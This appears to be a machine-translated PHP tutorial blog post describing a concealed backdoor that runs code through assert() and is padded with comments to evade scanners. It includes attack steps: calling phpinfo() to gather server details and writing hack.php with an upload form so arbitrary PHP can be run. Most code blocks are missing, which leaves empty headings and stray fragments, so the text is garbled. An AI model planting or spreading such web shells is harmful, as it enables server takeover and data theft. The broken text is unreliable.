Simple and concealed backdoor Trojan

: This article mainly introduces the simple and concealed backdoor Trojan code. if you are interested in the PHP Tutorial, refer to it. This article will introduce a very short and concealed backdoor Trojan, so that you can avoid Trojans when detecting programs.

The file content is as follows:

Many annotators are inserted in the code, which is difficult to detect if the server detection program is not rigorous.

After the Annotator is deleted, the code is as follows:

Finally, the actual code is as follows:

The php assert method was used to execute the program.

boolassert ( mixed $assertion [, string $description ] )

Assert () checks the specified assertion and takes appropriate actions when the result is FALSE.

If assertion is a string, it will be executed by assert () as PHP code.

If the content of $ assertion is phpinfo (), the server information will be returned so that attackers can obtain the server information.

After the backdoor program is uploaded, attackers can execute php statements on the server by creating a simple html file.
Assume that the backdoor file is backdoor. php.

 back door 
  
   
 
   
 
  

Attack method:
1. you can enter server information.

phpinfo();

2. create a php file that can be uploaded at will.

file_put_contents('hack.php', '
  ' ,true);

Create an html file to be uploaded and call hack. php.

 upload 
  
   
 
   
 
  

Then you can upload and execute the php file at will.

Copyright Disclaimer: This article is an original article by the blogger and cannot be reproduced without the permission of the blogger.

The above introduces the simple and concealed backdoor Trojan code, including some content, and hopes to help those who are interested in the PHP Tutorial.